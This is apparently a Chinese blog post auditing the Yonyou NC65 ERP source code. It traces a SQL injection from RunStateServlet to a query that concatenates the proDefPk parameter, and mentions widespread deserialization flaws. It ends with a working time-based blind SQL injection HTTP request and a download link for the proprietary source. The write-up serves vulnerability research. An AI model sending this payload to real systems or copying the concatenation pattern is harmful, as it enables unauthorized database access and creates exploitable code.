闲来无事,刚好手里用友NC源码,来一波代码审计,安装包放在文末。
版本NC65,这个版本漏洞通多的,特别是反序列漏洞,基本上全局搜索ois.readObject等关键,就能找到存在反序列漏洞的点。
当然sql注入漏洞也不少,接下来分析sql注入漏洞
runStateServlet sql注入漏洞
代码路径:C:\yonyou\home\modules\webimp\lib\pubwebimp_cpwfmLevel-1\nc\uap\wfm\action\RunStateServlet.java
从代码中,proDefPk参数,进入了getRenderProcessXml方法
getProDefByProDefPk 和 getProInsByProInsPk 方法都存在漏洞
proIns = (ProIns)WfmProinsUtil.getProInsByProInsPk(rootProInsPk);prodef = (ProDef)WfmProDefUtil.getProDefByProDefPk(prodefPk)
不过本次重点分析 getProDefByProDefPk
跟进 方法 getProDefByProDefPk
发现定义getProDefByProDefPk方法的接口类IWfmEngineUIAdapter
搜索getProDefByProDefPk方法的实现类
在WfmCpEngineUIAdapter类中引用了IWfmEngineUIAdapter接口类
getByProDefPkAndId
接着跟 getProDefVOByProDefPk 方法
在WfmProDefQry类中实现了getProDefVOByProDefPk 方法
getProDefVOByProDefPk方法,proDefPk参数在进行sql查询,直接拼接了字符串proDefPk 造成sql注入漏洞
public WfmProdefVO getProDefVOByProDefPk(String proDefPk) throws WfmServiceException {PtBaseDAO dao = new PtBaseDAO();SuperVO[] superVos = null;try {superVos = dao.queryByCondition(WfmProdefVO.class, "pk_prodef='" + proDefPk + "'");}catch (DAOException e) {WfmLogger.error((String)e.getMessage(), (Throwable)e);throw new LfwRuntimeException(e.getMessage());}if (superVos == null || superVos.length == 0) {return null;}return (WfmProdefVO)superVos[0];}
漏洞数据包
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1Host: 192.168.63.129:8088Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 19
NC源码
链接:https://pan.baidu.com/s/10V-1Foq6MJp82JDF3NHKxg 提取码:9496